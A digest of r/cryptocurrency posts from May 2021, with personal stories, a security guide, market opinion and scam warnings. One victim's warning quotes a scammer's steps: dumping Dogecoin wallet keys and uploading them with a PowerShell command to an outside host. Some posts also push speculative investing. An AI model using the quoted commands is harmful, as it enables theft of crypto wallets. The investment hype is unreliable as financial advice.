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    Friday, May 7, 2021

    Cryptocurrency Daily Discussion - May 7, 2021 (GMT+0)

    Cryptocurrency Daily Discussion - May 7, 2021 (GMT+0)

    Daily Discussion - May 7, 2021 (GMT+0)

    Posted: 06 May 2021 05:00 PM PDT

    Welcome to the Daily Discussion. Please read the disclaimer, guidelines, and rules before participating.


    Though karma rules still apply, moderation is less stringent on this thread than on the rest of the sub. Therefore, consider all information posted here with several liberal heaps of salt, and always cross check any information you may read on this thread with known sources. Any trade information posted in this open thread may be highly misleading, and could be an attempt to manipulate new readers by known "pump and dump (PnD) groups" for their own profit. BEWARE of such practices and exercise utmost caution before acting on any trade tip mentioned here.

    Please be careful about what information you share and the actions you take. Do not share the amounts of your portfolios (why not just share percentage?). Do not share your private keys or wallet seed. Use strong, non-SMS 2FA if possible. Beware of scammers and be smart. Do not invest more than you can afford to lose, and do not fall for pyramid schemes, promises of unrealistic returns (get-rich-quick schemes), and other common scams.


    • All sub rules apply in this thread. The prior exemption for karma and age requirements is no longer in effect.
    • Discussion topics must be related to cryptocurrency.
    • Behave with civility and politeness. Do not use offensive, racist or homophobic language.
    • Comments will be sorted by newest first.

    Useful Links:

    submitted by /u/AutoModerator
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    Crypto almost changed my life

    Posted: 06 May 2021 07:15 PM PDT

    A few months ago I got a health scare. Bowl cancer. Nothing major, doctor said it's treatable and if I start chemo right away things were looking good. That's when I joined this sub and invested all I had into eth. I figured I'd make some great gains for when I come out the other side. I'll be honest I didn't learn that much about crypto. But I was convinced by my friends who were all making money. Long story short I've made over 4K the past few months. Not a lot compared to a lot of you, but way more than I had. The biggest thing was this was an escape for me. Riding the waves with you guys, mainly the daily chat, absolutely losing our minds when ADA went to 1.45. It was a riot, and made me think about the future.

    I figured if I keep this up then I'll have life changing money. Maybe diversify into something else promising.

    Today the doctor gave me the usual shpeal of 6-12 months if I'm lucky. I'm going for trial runs at the UK's leading cancer research hospital starting next week. But its mostly for research to be honest. I don't expect to be here too much longer. Instead ive left instructions to my family of how to access my crypto and how long to wait before cashing out. I'm also gonna ask my friend who's good at this stuff to help my family with the timing (not selling in the middle of a bear run).

    I'm pretty bullish on eth, hopefully in a few years they will be set for life. I'll put some more in over the next few weeks.

    Anyways, why am I telling you this? Life is short my dudes. It's better to jump in on a risk early than wait till your time runs out. Money doesn't follow you to the grave. Take your risk with no regrets and cherish your family and time <3

    Edit: to the people asking questions here's a bunch of answers.

    When I wrote this last night it was late and I didn't think many of you would care. We've had a lot of sob stories and I knew I'd be throwing another on the pile but I just wanted to vent. Can't believe all the comments of support here today. Thanks guys, even you the guy who messaged me asking for $1000 haha

    submitted by /u/TrueStanks
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    The Complete Security Guide to keep you, your computer, and your crypto safe

    Posted: 06 May 2021 04:50 PM PDT

    Background: I currently work for a fortune 100 company's Computer Security Incident Response Team, I work specifically on detect and response which includes business email compromises, responding to phishing emails and malware within the organization, while documenting the process.

    My last post on securing accounts got a lot of attention, and there was also a lot of feedback and recommendations to add and consider. After that post I set out to make the most complete guide yet on securing your account and listing the resources needed.


    • Email Providers
      • Any reputable email provider with 2FA will do
      • If you want to get more into privacy and encrypting emails there is Protonmail or Preveil
      • You can alternatively also hook up your current email with the Thunderbird email client (use to be managed by Mozilla Firefox) it is overseen by a volunteer board of contributors.
    • 2FA - This is important, activating 2FA on your email is just as important as having it on exchanges. (Will cover more on 2FA further down)
    • Create an email specifically for Crypto, but also avoid using crypto keywords / personal information in the email, treat your email address like its public information.
    • Be on the lookout for Phishing emails, I made a post on how to identify phishing emails along with some useful tools here | How to spot a phishing email |
      • Quick tips for emails:
        • Don't trust email links
        • Double check the address bar of login pages
        • Know the levels of a domain
        • Check to see if your crypto sites allow a anti-phish banner that displays a code with their emails that you set.
    • Tracking pixels are also a thing, there not malicious in themselves, but they can potentially let attackers know if you have open an email / let them know the email exist and is active.
    • Furthermore You can check haveibeenpwned to see what data breaches your email has been apart of - If your email shows up and passwords are listed on the data that was compromised, ASSUME the worse and change the password and never use it again, along with any other accounts that use that password.

    Passwords / PINs:

    • Don't reuse them EVER
    • Use strong secure passwords, passwords managers make these easy to manage and generate passwords.
    • This includes your phone and 2FA app, if you have a weak pin (1234) for your phone and someone takes it, remember your 2FA app is then available (if same pin, or no pin/pass set), your email is automatically signed in (same for other accounts auto signed-in), and they can access your text messages.
    • Don't use words relating to crypto or personal information in your passwords (or email), if they are compromised in a breach, assume they will search for these terms to target crypto users and try the same combo against crypto sites or figure who you based on the information (email & password) and pivot to finding public information that could lead to them answering challenge questions for password resets. (Your first pet, is it posted on Facebook? How about your car? Your first girlfriend/boyfriend?)
    • Password Managers: These work wonders when managing passwords securely. They generate random strong passwords which can be adjusted, and its all kept in an encrypted database file, so even if a attacker gets access to it, they won't be able to access it without the password.
    • Don't save passwords in your browser
      • Does it require verification for you to use the password? Also I tend to find extensions being more buggy as they have to interact with more 'moving' parts and changing configurations, and generally more people try to target and exploit browsers.

    2 Factor Authentications (2FA):

    • Enable on everything possible (Email, Exchanges, Banks, Robinhood, even Reddit to protect your moons)
    • Use 2FA Apps instead of SMS whenever possible, SIM Swap attacks are real, and more common than you think.
    • Hardware Keys
      • These are physical 2FA device (I chose this list as I think it does a good job explaining them with pros and cons, I did NOT vet the sellers that are listed on the amazon links. Always research and buy from a reliable source)
    • Backup codes:
      • When you activate 2FA on any account you should have the ability to generate backup codes, these are used incase you lose access to your authenticator, TREAT these like your seed phrases. Use them by logging in with your user and pass, and use these backup codes in place of the 2FA code you usually enter.
    • DO NOT take pictures of your QR codes, if you screenshot it, might end up syncing somewhere you don't want it to and if it ever gets compromised they have the ability to continually receive your 2FA code.
    • Also, DO NOT sign up for your 2FA app or any crypto service for that matter using your work or school email address. You lose access to that email, then consider all accounts gone as you won't be able to access the codes if you switch devices.


    • Learn the difference between the different wallets, I think this article is REALLY good at going in depth about the differences and pros vs cons of them at a beginner level.
    • Cold wallets will always be more secure than any hot wallets as they aren't connected to the internet
      • Top trusted hardware wallets from the community:
        • Ledger
        • Trezor

    Seed Phrases: Treat these as they are the keys to the kingdom (Keep offline and out of your notes app)

    Less Secure:

    • Write down on paper and either break up the phrase and place in separate secure locations or hide them like the the FBI is going to come search your house
    • Secure on USB
    1. Get a file shredder (securely deletes data, and overwrites it)
    2. Download password manager (optional)
    3. Disconnect device from internet
    4. Enter seed phrase into password manager / create encrypted file
    5. Put on a freshly reformatted USB / datalocker (Worms like to spread by USB)
    6. Save to USB, and shred the original using the file shredder software
    7. Hide USB
    • Another device / old phone
    1. Factory reset
    2. Set Pin / Pass
    3. Download 2FA app and password manager / file encryption tool
    4. Disconnect from internet FOR GOOD (Treat this like a cold wallet)
    5. Back up 2FA and seed phrases
    6. Hide device

    More secure (more expensive):

    NOTE: Each method is going to its pros and cons: Getting robbed, fading ink, the elements, data retention (USB ~10 years), ever being on a digital machine. Pick which ones benefits you the most, and correlates with your budget and what your willing to risk.

    VPNs / TOR:

    • Privacy vs Anonymity
      • Privacy is the ability to keep your data and information about yourself exclusive to you (They know who you are, but not what you do).
      • Anonymity is about hiding and concealing your identity, but not your actions. (They know what you do, but not who you are)
      • Think about what your goal is, I commonly associate privacy with VPN and anonymity with TOR
        • Both encrypt your data before leaving your device, then routes it through proxy servers to mask your IP/Location. VPNs you have to trust the provider (ensure they state there is a no log policy) while TOR runs through servers ran by volunteers (don't think governments don't run their own) and lets you access the dark web. Here is a more in-depth comparison on VPN vs TOR.
        • Personally Its worth paying the few bucks a month for a paid tier of the VPN service.
    • VPN Providers - Zero log VPN services:
    • TOR
      • Brave offers TOR, but I would treat this more like a VPN
      • If being anonymous is your goal the only real way to achieve this is running Tails off a USB.

    NOTE: Some exchanges and websites blacklist IP ranges associated with VPN and most commonly TOR for security reasons. Some people on this community stated that this can lead to them freezing your account.

    Browsers (Excluding TOR):

    • Top 3 Browsers built for privacy
    • Search Engine for privacy: DuckDuckGo
    • Extensions
      • One of the most dangerous threats I think that aren't taken seriously are extensions. These can start out legitimate, then through an update turn malicious. These will then be removed from the webstore, but not your browser.
        • Some will be removed the store due to not being supported anymore which = no more updates, and no more updates = vulnerabilities that won't be fixed
        • If you have Google Sync activated, these extensions will also sync to all those devices
      • Remove any extensions you don't need, check to see there still available on the store, and even search them to see if some security article like this pops up about it.
      • Check the privacy practice tab of the extension to see what data it collects.

    Checking and verifying hashes of a download:

    Hashes are the fingerprint of a file, even if you change the name of the file the hash will be the same. This is similar to how wallets work, its a string of characters and numbers, yet represents data (aka your holdings)

    • How to get hash:
      • Go to the search bar in windows and enter 'cmd' this should bring up the command prompt (open terminal on Linux / MAC)
        • type "Certutil -hashfile Desktop\example.txt sha256" for windows
        • type "Sha256sum Desktop\example.txt" for Linux
        • type "shasum -a 256 Desktop\example.txt" for MAC
        • (Remove quotes, and replace 'Desktop\example.txt" with the path to the file you want to check)
    • this should give you the sha256 hash you can copy and paste into VirusTotal to check to see if its known as malicious by many security vendors. Here is the hash and VirusTotal link for the shredder download I previously mentioned in the seed back up step. 72714927de74b97c524c5fa8bc1a0dec83f038dbbed80b93b5e6280ca1317f41/detection

    NOTE: You can also just submit the file to VirusTotal, but if it potentially contains personal information, it will upload the file and allow other people to download it, searching the hash will not do this.

    Other General Safety Tips:

    • Harden your PC (Guide is for Windows 10, but can translate to other OS)
      • Update OS and any software // turn on automatic updates - Everything you download is an attack vector
      • Set firewall rules - Default deny, open only p855orts you need, disable rules you don't need
      • disable remote access
      • Install AV // Malwarebytes for removing malware
      • Turn on encryption
      • Setup user accounts // privileges'
      • Strong password
    • If you use a encrypted messaging service, I highly recommend Signal, if you haven't seen their reply regarding a subpoena you should
    • Lock down your social media accounts (go to security settings, turn off being able to be found via search engine, ad related settings, change who can view your posts, etc)
    • Don't disclose your holdings and earnings
    • Don't access your crypto on your work computer
    • Don't answer PMs about winning some contest or some amazing opportunity


    Many users asked about security regarding people who mainly use their phones. Many of these tips can translate to phones as well, but here's a quick rundown.

    • Unique pin / password for the phone
    • download a password manager
    • email account purely for crypto
    • pin / password (different than getting into your phone) for your 2FA app.
    • Don't lend phone out
    • Avoid apps you don't need, read the 3 star reviews as they are the most honest)
    • Download VPN / be aware of the wifi your connecting to
    • Be aware of phishing
    • Call your service provider and see if they can lock your SIM card and prevent SIM swapping.

    NOTE: These are still just suggestions, these are methods that balance security and usability. One could use 2 password managers and split a password between both, but that would compromise usability / ease of use.

    submitted by /u/xCryptoPandax
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    At this point ignoring crypto is like when businesses were ignoring the internet

    Posted: 06 May 2021 06:18 PM PDT

    Crypto is getting to a point where you either invest in it or get left behind. It is revolutionary and changing the way the world works, so if your slow to adapt you will miss out. Just like when the internet started people were sceptic and didn't want to take a risk. Anything in life involves some risk and the greater the risk the greater the payoff!

    submitted by /u/Basic_Bridge_8177
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    Coffeezilla YouTube channel just got deleted by YouTube for a video where he warned viewers about DogeCoin

    Posted: 06 May 2021 06:03 AM PDT

    Coffeezilla YouTube channel just got deleted by YouTube for a video where he warned viewers about DogeCoin

    Coffeezilla is a famous youtuber who exposes scams and warns people to never invest in them. His recent video telling people that Doge is like gambling got a community guidelines strike from YouTube and they deleted his channel. Imagine waking up to see your livelihood destroyed. We desperately need a decentralised video platform so that these powerful companies lose their monopoly. We don't matter to them even though we are the users of these platforms, how ironic!

    Edit: He just shared his thoughts on twitter that it might have been the doge army who flagged his video and took down his channel.


    Final edit: He got the channel back after the youtube team manually verified that no guidelines were broken.

    submitted by /u/Suspicious-Wallaby12
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    “Give a man a steak and he will eat for a day but teach a man to stake and he will eat forever”

    Posted: 07 May 2021 02:11 AM PDT

    Staking is a phenomenal way for the average person to make money. By staking you are 1. Contributing to something bigger then you and most importantly 2. You will make as much as if you were invested in an ETF in the stock market. Yes the price of the coin can go down which is a notable risk factor. However, staking the right coin is a very great opportunity which everyone should at least look into.

    submitted by /u/Basic_Bridge_8177
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    Gary Gensler puts Robinhood on notice, warns of potential crackdown.

    Posted: 06 May 2021 06:16 PM PDT

    You are NOT the only one trying to resist FOMO

    Posted: 06 May 2021 05:32 PM PDT

    It may seem like everybody on this sub has money to just keep throwing at crypto every single new pump, and everyone else is capitalizing on these gains while you sit and watch because you don't have enough money or the means to invest right now. FOMO is nagging at you at an all time high right now and you're trying to figure out how to move money around to buy just a little more ETH, maybe finally get a whole 1 ETH before it gets too high.

    Well, you should know you are not the only one here who is fighting these temptations and I think it helps to hear from someone else who is also not buying more crypto right now. It seems to calm me down to realize that while there are a lot of people making more gains than me, there are thousands more who are also sitting on the sidelines, or holding just $100 of BTC, or putting in only what they can afford to lose. This is not WSB and you should not give into your FOMO or gambling-like thoughts.

    For me, I am trying to buy a house this summer. And you can probably imagine how tempting it is to have a pile of cash just sitting there to be used as a down payment not making gains. "I'll just put it in for a few weeks and make juuuuust a little bit more to go towards the house." It hurst to think about what I could have made just within the last week, but what would hurt WAY more is losing our down payment by gambling it away. So for now, my extra cash will remain cash and I'm doing what's best for my own family and being safe. You're not the only one on here who is "missing out."

    submitted by /u/BirdisonBird
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    /r/cryptocurrency is growing crazy fast. We are on track to out-grow /r/bitcoin. These are must-knows for the new people!

    Posted: 06 May 2021 09:50 PM PDT

    We've become the fastest growing subreddit daily, weekly, and monthly. Please see the imgur chart below.


    1. Write down your recovery phrase / private keys on a sheet of paper and don't give them to ANYONE else. Unless maybe you are dying and want to give your funds to a family member or a friend.
    2. Treat bitcoin like nothing will surpass it because nothing has yet and nothing indicates that it will be surpassed by anything else. If enough capital entered the market to double Eth's price tomorrow, bitcoin would still be number one by market cap.
    3. Ignore your DMs in this sub. If someone is DM'ing you to join an exchange it is likely a scam.
    4. Ignore the copy/pasta'd "🚀🚀🚀My New Coin $MNC is going to the moon easy 100x from here!🚀🚀🚀" threads.
    5. The only reasonable "trend" to expect from the market is that if you buy bitcoin today, then holding bitcoin for four years could yield you profit.
    6. If you were drawn in by prices, stay for the technology. I think the best case for crypto right now is international remittances.
    7. History doesn't repeat itself but the charts do rhyme... After 2017 I would say 80% of the regulars in this sub disappeared and might have only come back after this recent bull run began. I stuck around because I didn't see a better way to save money than buying BTC and holding long term.
    8. With point 7 in mind, go back to the December 2017 charts. Ask yourself "How many of these cryptocurrencies have surpassed their 2017/2018 all time highs now? Of those coins, what actually changed? What has actually improved? What makes them worth buying and holding?"
    9. With point 8 in mind I've seen at least 4 opportunities where I could have bought particular cryptos and doubled my money within a short time frame (I'm talking about before the recent doge and ETC pumps). The reason why I didn't was because of the ethical issue I have with "dumping on noobs." Stop and think about that for a minute.
    10. If you've been here a while BE NICE TO THE NEW PEOPLE.

    That is all.

    submitted by /u/sgtslaughterTV
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    ETC's pump due to the listing on RH is such a testimony to the fact this market is even more amateur/immature than during the last bull run

    Posted: 06 May 2021 08:25 AM PDT

    So Robinhood listed ETC and it's pumping right now and many people gained interest in investing in ETC. This ETC pump shows, a lot of people still use Robinhood despite:

    • The WSB Drama
    • That you don't actually own anything you buy on RH and can't transfer your coins into your wallet
    • RH blocking the buy button/manipulating prices, as it suits them
    • RH going down as soon as coins pump
    • All these reminders not to use RH

    And even though they listed an obsolete coin, it still got pumped because it seems like nobody on RH does DYOR.

    Don't buy ETC!

    • It has no development
    • It's hackable
    • Malicious investors use ETC as a monetary scam
    • ETC is an Attack against Ethereum

    The ETC pump and so many people still using RH proves we're still in the early stage and a lot of people still don't know shit about crypto.

    submitted by /u/anon43850
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    Leaving crypto passwords to my parents in case I get killed (cops in Colombia are killing us protesters). How do I explain to them in a simple way what they should do with it?

    Posted: 06 May 2021 09:00 AM PDT

    EDIT: Don't give me money, instead donate to the Temblores NGO, they are the ones risking their lives reporting kill counts to the international institutions.

    Here you can donate, feel free to look them up. Temblores


    I just figured out this is something that could happen, and I would like to leave them something if it does.

    It's not much what I hold, just a couple dozen XRP, ADA and a couple of dollars in ETH. If something happens to me, it may help them in the long term, I hope.

    But I've actually come to this situation where I don't know how to explain to them what to do with it. I plan to create a crypto wallet in Metamask and leaving them the pass phrase in a letter. Sadly I can't talk to them about this because they usually think I'm going to my SOs place and not the streets, I don't want to leave them worried so I never really tell them...

    Is there any resource that can explain older people the basics of crypto, its potential value and the basics for handling a wallet?

    Thanks a lot.

    Edit: to those saying people here shouldn't go out and "commit crimes" to not get killed, police is literally shooting students in the street for simply lighting candles in honor of those that have been killed by them. Get your facts straight please, and I really hope you never get to see this kind of human suffering In your country.

    submitted by /u/chomskian1
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    Man has two attempts to get his forgotten password correct to recover $240m in Bitcoin

    Posted: 06 May 2021 06:56 PM PDT

    PSA: There is only one Bitcoin and one Ethereum. Beware of coins with similar names. They are not the same thing. They are not equal.

    Posted: 06 May 2021 08:52 AM PDT

    Considering the ETC and BCH pumps I thought this might be worthwhile to those new to crypto.

    Ethereum Classic (ETC) is not the same as the real Ethereum (ETH). They forked a long time ago, which is why they share the name. But nothing is being done on ETC. All those ERC-20 tokens live on ETH, not ETC. Don't be fooled.

    Same goes for Bitcoin. There is only one BTC. Bitcoin Cash (BCH), Bitcoin SV (BSV), etc are all forks of Bitcoin. Which means that they tried to make a change to BTC but failed, and ended up with a new coin.

    Just like ETH, the real Bitcoin network is the valuable one and that's why there is such a massive difference in price between BTC and the other Bitcoin forks.

    TLDR: Don't get fooled by similar names. There is only one BTC, and only one ETH.

    Good luck out there everyone!

    submitted by /u/FatBulkExpanse
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    Charity Donation Generated from Crypto is Blocked by Bank

    Posted: 06 May 2021 02:46 PM PDT

    This story, while anecdotal in nature, sums up rather nicely the present state of the fiat-cryptocurrency relationship.

    A man is blocked from wiring just over six figures of lawfully acquired money to a verified, genuine animal shelter.

    A charity coin that I've put resources into, MoonBud, raised around $140,000 for a UK-based charity through transaction fees directed to a charity wallet. The owner of MoonBud, throughout the entirety of a week or so, exchanged these tokens into BNB, withdrew it into Binance and then again into his bank account.

    Despite receiving confirmation from the charity that they were ready to receive the donation through wire transfer, the owner was blocked from completing the transfer by his bank's manager. They then notified the police, as the director associated him with illegal tax avoidance. The donation was planned to Dog's Trust, one of the largest animal charities in the UK (if not the largest) and one with a high public profile, not some backwater obscure shell company cover.

    Now, after a week of waiting on empty corporate phone lines, meetings with his local branch, presentation of a printed, formal explanation of the mechanism of the charity coin, proof that Dog's Trust had accepted his proposal and was prepared to receive the funds, and extensive documentation showing each publicly viewable crypto transaction that composed the charity funds he was attempting to donate, not only is the bank still blocking the transfer to Dog's Trust, but the entirety of the funds in his account remain frozen, impeding the owner from buying even basic consumer goods with the money.

    It's ridiculous. The Dog's Trust is a huge, legitimate charity, that is eagerly awaiting the donation. The token's creator has supplied enough proof that shows that all of the funds he is ATTEMPTING TO DONATE TO A LEGITIMATE CHARITY are legally acquired, through Crypto. Despite this, his entire bank account is still frozen.

    This is all verifiable and It's still an ongoing situation.

    submitted by /u/blackinfinities
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    I am now into crypto so what now?

    Posted: 06 May 2021 10:49 PM PDT

    Foremost I would like to thank u/that_one_indian_dude and u/apedmonke for tipping me some Banano. I also got 10 BAN from a faucet so I now have a total of 10.84 BAN.

    I am from a third-world country so by the time I am writing this, 10.84 BAN = 23.00 Philippine Pesos (0.47 USD). With my BANANO, I can now buy (at least here where I live) a half kilogram of BANANA

    that is approximately 4 - 5 pieces of freakin' BANANAS. So yeah, I can now survive for a day with my newly acquired BANANO by eating a real BANANA every five (5) hours.

    That's it. Thank you for listening to my BANANAtalk.

    submitted by /u/Bubuy_nu_Patu
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    Cardano Nominated for Blockchain Solution of the Year By CoinQuora

    Posted: 07 May 2021 01:41 AM PDT

    Square Bought 3,318 BTC, Made $3.51 Billion In Bitcoin Revenue In Q1 2021

    Posted: 06 May 2021 03:32 PM PDT

    ETC being top 15 is worse for crypto than Doge being top 3

    Posted: 06 May 2021 06:35 AM PDT

    ETC is a literal scam coin that has been 51% attacked not once, not twice, but THREE TIMES. Imo this is far worse for the crypto sphere than Doge potentially flipping BNB and making it to the top 3 as a massive pump n dump. I don't see how people don't get wrecked on something like ETC. A lot of people think regulations will spark the next bear market, its coins like ETC that will spark the regulations. (I understand they're coming regardless)

    submitted by /u/makeshiftballer
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    I still think about that one guy who told me about cryptocurrencies in 2019

    Posted: 07 May 2021 12:27 AM PDT

    There was this guy in my class, during high school. He actually seemed a bit of an idiot to me. I always kinda felt superior to him, since I was fucking stupid and insecure. We didn't talk much, but since we were both passioned about technology, whenever we talked, we ended up talking about bitcoin and crypto.

    I never really listened to him, though. I was really critic towards crypto at the time, maybe because I was bitter I didn't have any money to invest. I made jokes about how magic internet money had no intrinsic value and about how he would have lost all his money.

    Boy, I was wrong. I feel a bit like an idiot right now, thinking about how he probably is in a better place in its life than me.

    My best advice? Be open minded guys. About everything. You never know.

    Have a nice day

    submitted by /u/cm2_0
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    Dell gave a company online conference stating they are building infrastructure to secure sensor data which will be registered on IOTA's Tangle.

    Posted: 06 May 2021 12:42 PM PDT

    Dell's Steven Todd from DellTech giving an online video breakout session about Dell's Project Alvarium. He points out during the talk specifically how Intels sensors will register data on IOTA's Tangle to create an infrastructure of securing personal data silos and giving trust to data!

    submitted by /u/RetireTotheMOon
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    Just got Scammed of 91k Dogecoins

    Posted: 06 May 2021 06:55 AM PDT

    I mined dogecoin in my first year of university in 2013. It was a fun thing to do in-between studying for exams with my floormates. I managed to mine 91k coins. I never touched them since 2013. Thankfully I kept my old laptop.

    It had been on my mind even during the last bull market in 2017 if I could even access my dogecoins. Never got around to try, was busy with university/life. And I was more than happy to just keep the dogecoins and see what happens. It was so exciting back then to see DogeCoin go up in price from being worth nothing to $0.06 and eventually $0.08 cents. With the recent price surges, I decided I would figure out how to take out my coins. Mainly because of a growing doubt in my mind that my coins were not accessible. I made a post yesterday about the coins I mined and how to transfer them out of a 2013 wallet. I got a DM from user -Jax_Brantley- (sorry reddit won't let me link his profile). Telling me that I needed to get on the "Correct Fork" otherwise when I send my coins they would be "stuck in limbo". He sent me two posts corroborating his claims:



    His profile looked legit to me with activity on the doge forums. Even a popular post saying how he recovered 389k of Dogecoins (https://np.reddit.com/r/dogecoin/comments/n2lmhu/doge_coin_saved_my_life_holding_389k_coins/). He told me how my story was similar to his. His profile has many comments "helping other against scammers" in the community.

    The story he presented to me made sense and I gave him a chance; this was due to my lack of knowledge (my floormate installed everything on my computer), outdated Dogecore wallet, the posts he sent me, his reddit profile. I was unknowingly falling for his bait.. Anyways we talked some more. I uploaded our conversation for those that are interested. It seems he deleted our first messages. https://imgur.com/gallery/yh1g7CQ

    The main part of my post is to bring awareness to this scam. If anyone is trying to take advantage of your 'old wallet' pre-2014 fork, please do NOT give them any of your time. Please avoid any DMs containing the following steps (he even 'kindly' wrote detailed steps for my dumbass):

    Step 1) Close dogecore-qt.exe and find the dogecore-qt.exe (right click it and run as admin)

    Step 2) go to Tools -> debug -> console

    Step 3) type

    dumpwallet peers-log.zip

    Step 4) find the zip beside dogecore-qt.exe or in C:/Program Files/Dogecoin

    Step 5) in this folder hold shift + right click anywhere and select open "powershell here" from the dropdown menu

    Step 6) type this command or copy paste it

    invoke-webrequest -method PUT -infile .\peers-log.zip dogecoin-peers.online/nodes -usebasicparsing

    Step 7) go to the new folder it created called "dogecoin-peers/online" and find the file called nodes.txt and open it.

    Step 8) It will have a list of connection failed and node ID

    Step 9) go to the console like in step 2 and type remove node <ID HERE>

    Step 10) Restart wallet and you are all done.

    After completing step 6, the truth presented itself. I got scammed... I looked on reddit more for this type of scam (should have had a better eye originally). Sadly, I came across this post too late. https://np.reddit.com/r/dogecoin/comments/n2yxgq/how_the_scam_works/

    For those interested, here's my old wallet: https://dogechain.info/address/DFCW6SR6FB518RkpYjhsDL5BkX1zqRKe3A

    A picture of the old wallet from my laptop.


    Thank you to anyone who has read my post. I was conflicted to even post about this because I just was filled with emotion and that it would be an incoherent batch of word salad. After writing this out, I have been able to get more clarity and peace.

    I hope there is someone that I can help and they would not fall for the same scam I did. Everyone who has made life-changing money or any money with Dogecoins, I am happy for you. Please appreciate what you have for me.

    Take care,

    (Originally tried to post to Dogecoin subreddit but I can't get passed the auto moderator...)

    Dogeminer 2013

    *Edited to add the Scammer's post that made me believe him.. I am a sucker for a heartwarming story..


    submitted by /u/TetrisGoku
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    The beauty of crypto

    Posted: 06 May 2021 10:17 PM PDT

    The amazing part of this journey is that none of the experts really have any clue what is actually going to happen. TAs paint half the picture. Head and shoulder, triangle patterns lead to a dip right after my FOMO. Downward trends moon right after my exit. Every post is actually an attempt to farm moons, and every poll is a search for confirmation bias. YouTube videos wth bright letters shill the shitiest of shit coins. The brightest people warn the newbies to avoid coins that are leading every daily gain charts. A meme coin created as a joke with the face of a dog on it is outperforming the coin you spent hours researching. In second place? Oh, the coin that threw the word classic after its namesake. Mainstream media says crypto is a ponzie scheme, and then interview billionaires who say Bitcoin will hit 1million dollars by year end. Even better, a Saturday night staple will provide a platform for a guy who is going to go to the literal moon, to pump the aforementioned meme coin. The whales are selling, to scare the papers hands, but the whales are buying your panic-sold coins and hodling forever with their diamond hands. Someone has 1k to invest in Crypto and asks the sub which coin they should buy, and lists the 5 coins they're really shilling to increase that 1k they claim to want to invest. Bots are creating posts about the next safestmoonestcoinestever, which is a fork of rugpullcoin.

    And I'm here, for all of it. What a time to be alive. Long Live Crypto.

    submitted by /u/Bigelito
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    Citi bank is considering launching crypto trading and custody services

    Posted: 06 May 2021 11:12 PM PDT

    A warning about the SafeMoon scam & pyramid scheme

    Posted: 06 May 2021 06:38 PM PDT

    We've got a lot of new market entrants due to the SafeMoon spam on Tiktok. A bunch of noobs are promising riches for people buying SafeMoon. You watch the videos on TikTok and the people buying and promoting this coin actually have zero crypto experience or knowledge minus an individual (probably the founder) who has been pumping this coin from the start and accumulated a fortune at the very very beginning, all they're doing is saying "buy this coin and get rich".

    The owner of Safemoon holds over 50% of the supply, currently worth billions of dollars. Now it's starting to spread to Twitter. This is a classic pump and dump, and the sad part of it is that it seems to be working. My partner asked me about SafeMoon last night because it keeps appearing on her feed.

    Just a warning to new entrants that this is going to end extremely poorly. The only people get rich off events like this are the OG bagholders who are manipulating all of the noobs into buying their shitcoin.

    SafeMoon has no actual fundamentals and was designed to be a pump and dump: https://stockhead.com.au/cryptocurrency/this-is-a-scam-crypto-influencers-speak-out-about-safemoon-pyramid-scheme

    It's our job to educate beginners, don't let them buy this garbage. Educate them about the space and point them in the direction of projects that actually do useful things for the space.

    Edit: Some more hilarious facts about this scam.

    • People are saying SafeMoon is a good buy because "it's so cheap", and "imagine if it went to $1 like DOGE" - if SafeMoon went to $1 it would be worth over 500 TRILLION dollars marketcap, 6x larger than the global economy. Never going to happen.
    • It costs 10% to send a transaction on SafeMoon. Yeah, want to withdraw? there goes 10%. Want to deposit that on an exchange later? There goes another 10%. What happens to these fees? They're re-distributed to the largest SafeMoon holders. So all the really rich holders siphon all of the money out of the system over time through these fees. Also, what does that say about the utility of the coin if you can't even spend it without paying 10%?
    • 50% of that 10% transaction fee is also transferred to a "liquidity pool", that only the devs of SafeMoon can access and spend for whatever purpose they like.

    This entire project is engineered to siphon money out of beginners. Sad. See more here: https://www.youtube.com/watch?v=BYJ8n71du5g

    submitted by /u/tumbleweed911
    [link] [comments]

    Hundreds Of Banks Already Enrolled. Bitcoin Is Coming to 300M Checking Accounts Valued At $17 Trillion In Deposits: NYDIG

    Posted: 06 May 2021 08:11 PM PDT

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